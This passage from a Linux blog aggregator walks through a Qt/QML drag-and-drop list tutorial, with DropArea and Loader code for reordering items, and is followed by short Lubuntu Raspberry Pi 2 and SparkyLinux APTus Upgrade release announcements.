    In contentItemWrapper, we set Drag.active to dragArea.drag.active. If we did not do this, we would still be able to drag our Item, but DropArea would not notice it moving hover them (DropArea.containsDrag would remain false). We also define Drag.hotspot to the center of the dragged item. The hotspot is the coordinate within the dragged item which is used by DropArea to determine if a dragged item is over them.

    When we start dragging, we change to the "dragging" state. In this state contentItemWrapper is reparented to draggedItemParent and the DraggableItem height is reduced to 0, completely hiding it.

    Unless you associate data to your drag, for example to implement dragging from an application to another, the DropArea won't emit the dropped signal. This is why we trigger the move in the handler of the MouseArea released signal.

    Dropping

    Now that we have the "drag" part, we need to take care of the "drop" part.

    Each DraggableItem contains a DropArea which is the same size as the DraggableItem and is positioned between its DraggableItem and the one next to it. This way when the user drops an item on a DropArea, we know we have to insert the dragged item after the item which owns the DropArea.

    There is a special case though: we also want the user to be able to drop an item before the first item. To handle this, the first DraggableItem of the list is going to be special: it will have another DropArea, with its vertical center aligned to the top edge of the DraggableItem.

    This diagram should make it clearer:

    DropArea positions

    As you can see, "Item 0" has two DropArea, whereas the other items only have one. Here is the code which adds the DropAreas:

    Loader {
        id: topDropAreaLoader
        active: model.index === 0
        anchors {
            left: parent.left
            right: parent.right
            bottom: root.verticalCenter
        }
        height: contentItem.height
        sourceComponent: Component {
            DraggableItemDropArea {
                dropIndex: 0
            }
        }
    }
    
    DraggableItemDropArea {
        anchors {
            left: parent.left
            right: parent.right
            top: root.verticalCenter
        }
        height: contentItem.height
        dropIndex: model.index + 1
    }
    

    We use a Loader to create the special DropArea for the first item of the list. DraggableItemDropArea is just a DropArea with a dropIndex property and a Rectangle to show a drop indicator. Before showing its code, lets finish the code of DraggableItem. The only remaining part is the function responsible for emitting the moveItemRequested signal:

    function emitMoveItemRequested() {
        var dropArea = contentItemWrapper.Drag.target;
        if (!dropArea) {
            return;
        }
        var dropIndex = dropArea.dropIndex;
    
        // If the target item is below us, then decrement dropIndex because the target item is
        // going to move up when our item leaves its place
        if (model.index < dropIndex) {
            dropIndex--;
        }
        if (model.index === dropIndex) {
            return;
        }
        root.moveItemRequested(model.index, dropIndex);
    }
    

    That's it for DraggableItem.

    DraggableItemDropArea

    Not much complexity here, we will actually remove this component later in the series. Here is the code:

    import QtQuick 2.0
    
    DropArea {
        id: root
        property int dropIndex
    
        Rectangle {
            id: dropIndicator
            anchors {
                left: parent.left
                right: parent.right
                top: dropIndex === 0 ? parent.verticalCenter : undefined
                bottom: dropIndex === 0 ? undefined : parent.verticalCenter
            }
            height: 2
            opacity: root.containsDrag ? 0.8 : 0.0
            color: "red"
        }
    }
    

    DraggableItemDropArea adds a dropIndex property and a Rectangle to draw the 2 pixel red line indicating where the item is going to be dropped, with a small hack to position the Rectangle correctly for the special case of the top DropArea of the first DraggableItem.

    That's it for this first article in the series. You can find the source code in the associated GitHub repository, under the "1-base" tag. You can now continue to the next article of the series.

    24 April, 2016 04:28PM

    Lubuntu Blog: Ubuntu 16.04 LTS on the Raspberry Pi 2!

    The Raspberry Pi 2 version of Lubuntu has been updated to Lubuntu 16.04 LTS. Now it’s available at the downloads section. Grab it while it’s hot!

    24 April, 2016 01:18PM

    hackergotchi for SparkyLinux

    SparkyLinux

    APTus Upgrade 0.1.23

     

    There is some changes in the Sparky’s default upgrade tool Sparky APTus Upgrade (aka System Upgrade) 0.1.23, such as:

    – added ‘–no-install-recommends’ option (it is not the default) to avoid installation extra packages which are not dependencies to the existing ones, but they are recommended and are installed as default. Using the new option, upgrade process will not install the recommended packages. Make sure that the first option called “Upgrade” make full system upgrade as it was making before.

    – the changelog is displaying in a Yad window now, instead of a text editor. It also cut of some lines, keeping only the most important.

    All the scripts have been reconfigured, so please install and test it.

    The ‘sparky-aptus-upgrade’ 0.1.23 package is available from Sparky’s ‘unstable’ repository.

     

    24 April, 2016 11:37AM by pavroo